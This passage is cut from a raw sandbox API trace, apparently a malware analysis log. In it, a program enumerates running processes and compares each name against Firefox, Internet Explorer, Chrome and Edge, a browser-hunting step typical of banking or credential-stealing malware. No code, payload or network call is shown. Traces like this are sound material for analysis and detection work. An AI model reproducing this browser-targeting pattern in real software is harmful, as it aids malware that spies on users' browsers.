lpString2="iexplore.exe") returned 1 [0221.840] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0221.840] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.840] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.841] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0221.841] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0221.841] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0221.841] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0221.841] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0221.841] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0221.841] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0221.841] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0221.841] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.841] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0221.842] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0221.842] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0221.842] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0221.842] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.842] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0221.842] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0221.842] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0221.842] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0221.842] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0221.842] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0221.843] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0221.843] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0221.843] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0221.843] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0221.843] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.844] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0221.844] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0221.844] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0221.844] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.844] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.844] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0221.844] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0221.844] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0221.844] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.844] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.845] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0221.845] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0221.845] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0221.845] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.845] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.845] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0221.845] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0221.845] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0221.845] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.845] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.846] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0221.846] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0221.846] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0221.846] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.846] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0221.846] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0221.846] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0221.846] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0221.847] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0221.847] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.847] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0221.847] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0221.847] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0221.847] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.847] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.848] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0221.848] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0221.848] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0221.848] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.848] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0221.848] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0221.848] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0221.848] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0221.848] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0221.848] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0221.849] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0221.849] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0221.849] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0221.849] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.849] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0221.849] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0221.849] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0221.849] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0221.849] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.850] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.850] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0221.850] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0221.850] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0221.850] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.850] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0221.851] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0221.851] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0221.851] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0221.851] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.851] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0221.851] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0221.851] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0221.851] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0221.851] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0221.851] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0221.852] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0221.852] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0221.852] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0221.852] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0221.852] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0221.852] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0221.852] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0221.852] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0221.852] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.852] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0221.853] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0221.853] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0221.853] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0221.853] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0221.853] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0221.854] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0221.854] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0221.854] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0221.854] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0221.854] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0221.854] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0221.854] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0221.854] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0221.854] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.854] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0221.855] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0221.855] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0221.855] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0221.855] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.855] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0221.855] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0221.855] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0221.855] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0221.855] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.855] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0221.856] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0221.856] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0221.856] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0221.856] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.856] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0221.856] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0221.857] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0221.857] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0221.857] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0221.857] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0221.857] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0221.857] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0221.857] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0221.857] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.857] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0221.858] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0221.858] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0221.858] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0221.858] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.858] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0221.858] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0221.858] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0221.858] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0221.858] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.858] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0221.859] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0221.859] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0221.859] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0221.859] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.859] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0221.859] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0221.859] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0221.859] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0221.859] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.860] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0221.860] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0221.860] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0221.860] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0221.860] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0221.860] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0221.861] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0221.861] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0221.861] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0221.861] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0221.861] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0221.861] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0221.861] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0221.861] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0221.861] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0221.861] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0221.862] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0221.862] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0221.862] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0221.862] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.862] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0221.862] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0221.862] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0221.862] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0221.862] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0221.862] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0221.863] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0221.863] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0221.863] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0221.863] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.863] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0221.863] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0221.863] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0221.863] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0221.863] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0221.863] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, 